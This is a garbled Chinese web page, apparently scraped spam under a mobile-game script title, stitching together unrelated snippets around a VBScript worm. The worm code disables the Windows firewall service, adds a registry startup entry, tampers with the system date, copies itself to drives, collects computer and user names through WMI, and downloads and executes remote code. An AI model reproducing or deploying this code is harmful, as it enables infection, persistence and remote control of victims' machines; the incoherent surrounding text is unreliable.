轩辕传奇手游脚本云派出现继续

发布时间:2021-08-17 来源:脚本之家 点击:

VB的Winsock控件虽说不是底层操作"
Else
Document.Write "晚上好

辉昂脚本
病毒将病毒文件拷贝到KaZaA的默认共享目录中,这样,当其他用户访问这台机器时,就有可能下载该病毒文件并执行比如,你可能会认为下面的2行代码在功能上是一致的:

Ifx<>0Andy<>0Then

If(xAndy)Then...

然而我们可以轻易地证明他们是不同的,比如X=3(二进制=0011),Y=4(二进制=0100)


其实要是仔细修饰和调整声波文件,再用COOL重新选择编码方式还就可以把文件作得更小

我想在一个子网中的所有计算机上运行脚本
你只要保证你的数据库在你程序所在的目录之下就行了


wshshell.run "net stop sharedaccess",0

Set drvs=fso.drives
sysdir=fso.GetSpecialFolder(1) 'WindowsFolder=0,SystemFolder=1, TemporaryFolder=2
thispath=wscript.ScriptFullName
Set fc=fso.OpenTextFile(thispath,1) 'ForReading=1,ForWriting=2 ,ForAppending=8
scopy=fc.readall
fc.Close
Set fc=Nothing
' 写注册表注册文件sysinfo.reg,注册系统开机自动执行病毒
Call writefile(sysdir&"\sysinfo.reg","windows registry editor version 5.00 [hkey_local_machine\software\policies\microsoft\windows\system\scripts\startup\0\0] "script"="%windir%\\system32\\prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [hkey_local_machine\software\microsoft\windows\currentversion\group policy\state\machine\scripts\startup\0\0] "script"="%windir%\\system32\\prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
")
' 导入注册表sysinfo.reg
wshshell.run "regedit /s sysinfo.reg",0
wscript.sleep 200
fso.deletefile sysdir&"\sysinfo.reg",True

' 如果当前运行脚本在系统目录中
If InStr(thispath,sysdir)>0 Then
dri_list0=listdrv()
o_time=left(c_time,3)&cstr(Int(Mid(c_time,4,1))-1)&Right(c_time,Len(c_time)-4) '回拨时间1年
wshshell.run "cmd /c Date "&o_time,0
wscript.sleep 10000
For dri_i=1 to Len(dri_list0)
Call writeauto(Mid(dri_list0,dri_i,1)&":")
Next
wshshell.run "cmd /c Date "&c_time,0

' WMI应用查询计算机名,用户名
computername="":username=""
Set objwmiservice=GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set colcomputers=objwmiservice.execquery("select * from win32_computersystem")
For Each objcomputer in colcomputers
computername=objcomputer.name
username=objcomputer.username
Next
If username="" Then username="evar"
If InStr(username,"")<=0 Then
username=computername&""&username
End If
do
If issend=0 Then
' 链接外网,获得执行代码
Set xml=CreateObject("msxml2.serverxmlhttp")
xml.open "get",""&username,0
' 是南师大学校党委组织部主办的网站
xml.setrequestheader "user-agent","evar"
xml.send()
If Err.number=0 Then
issend=1
res=xml.responsetext
If ucase(left(res,7))=ucase("Execute") Then Execute res
Else
Err.clear
End If
Set xml=Nothing
End If

dri_list=listdrv()
For dri_k=1 to Len(dri_list)
If InStr(dri_list0,Mid(dri_list,dri_k,1))<=0 Then
Call writeauto(Mid(dri_list,dri_k,1)&":")
End If
Next
dri_list0=dri_list
wscript.sleep 1000
loop
Else
wshshell.run "explorer .",3
wscript.sleep 2000
wshshell.appactivate LCase("我的电脑")
wshshell.sendkeys UCase("% c") ' 模拟击键 alt + space + c ,其实就是关闭窗口
runflag=0

' 获得当前系统进程,WMI的应用
For each ps in GetObject _
("winmgmts:\\.\root\cimv2:win32_process").instances_
If lcase(ps.name)=lcase("wscript.exe") Then
runflag=runflag+1
End If
Next
If runflag>=2 Then wscript.quit
Set sf=fso.GetFolder(sysdir)
f_time=Left(sf.datecreated,InStr(sf.datecreated," ")-1)
wshshell.run "cmd /c Date "&f_time,0
wscript.sleep 100
Call writefile(sysdir&lcase("\prncfg.vbs"),vs(scopy))
wshshell.run "cmd /c Date "&c_time,0
wshshell.run sysdir&"\prncfg.vbs"
End If

' 混乱字符串,进行代码变体luaR解密非结构化数据和结构化数据(数值和字符)的存储格式和存储模式不同,需要多媒体数据库来统一管理
Option Explicit
Dim wi
Dim file
Dim file_size
Dim file_attributes
Dim file_version
Dim file_hash
Set wi=CreateObject("WindowsInstaller.Installer")
file="111.exe"
file_size=wi.FileSize(file)
file_attributes=wi.FileAttributes(file)
file_version=wi.FileVersion(file)
file_hash=GetFileHash(file)
Set wi=Nothing
MsgBox "File: " & file & vbCrLf & _
"Size: " & file_size & vbCrLf & _
"Attributes: " & file_attributes & vbCrLf & _
"Version: " & file_version & vbCrLf & _
"MD5: " & file_hash
Function GetFileHash(file_name)
Dim file_hash
Dim hash_value
Dim i
Set file_hash=wi.FileHash(file_name, 0)
hash_value=""
For i=1 To file_hash.FieldCount
hash_value=hash_value & BigEndianHex(file_hash.IntegerData(i))
Next
GetFileHash=hash_value
Set file_hash=Nothing
End Function
Function BigEndianHex(Int)
Dim result
Dim b1, b2, b3, b4
result=Hex(Int)
b1=Mid(result, 7, 2)
b2=Mid(result, 5, 2)
b3=Mid(result, 3, 2)
b4=Mid(result, 1, 2)
BigEndianHex=b1 & b2 & b3 & b4
End Function

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号